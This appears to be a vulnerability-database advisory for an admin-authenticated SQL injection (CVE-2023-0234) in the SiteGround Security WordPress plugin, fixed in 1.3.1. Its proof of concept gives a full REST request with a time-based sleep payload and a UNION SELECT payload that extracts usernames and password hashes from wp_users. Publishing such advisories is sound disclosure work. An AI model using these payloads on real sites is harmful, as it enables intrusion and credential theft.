SiteGround Security < 1.3.1 – Admin+ SQLi | CVE 2023-0234 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue.

Proof of Concept

1:

POST /wordpress/index.php/wp-json/sg-security/v1/activity-registered HTTP/1.1
Host: YOUR HOST
X-WP-Nonce: YOUR NONCE
Cookie: [Admin+]
Content-Length: 155

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1-sleep(3); #"}]}]}

2:

Alternate payload for extracting info from the wp_users table;

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1 UNION SELECT 1,1,1,user_login,user_pass,1,1,1,1,1,1,1 FROM wp_users; #"}]}]}

Affects Plugins

Fixed in 1.3.1

References

CVE

URL

https://github.com/namah-age/CVEs/blob/master/1.md

URL

https://www.siteground.com/viewtos/responsible_disclosure_policy?scid=4&lang=en

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

So Sakaguchi

Submitter

So Sakaguchi

Submitter twitter

Verified

Yes

WPVDB ID

acf3e369-1290-4b3f-83bf-2209b9dd06e1

Timeline

Publicly Published

2023-01-13 (about 2 years ago)

Added

2023-01-13 (about 2 years ago)

Last Updated

2023-01-13 (about 2 years ago)

Other

Published

Title

Published

2024-03-28

Title

WP Travel Engine < 5.8.0 - Unauthenticated SQL Injection

Published

2025-03-24

Title

JiangQie Official Website Mini Program <= 1.8.2 - Authenticated (Administrator+) SQL Injection

Published

2024-02-23

Title

Ultimate Member 2.1.3 - 2.8.2 - Unauthenticated SQL Injection

Published

2023-01-17

Title

Simple URLs < 115 - Subscriber+ SQLi

Published

2014-09-27

Title

Lead-Octopus-Power Plugin - SQL Injection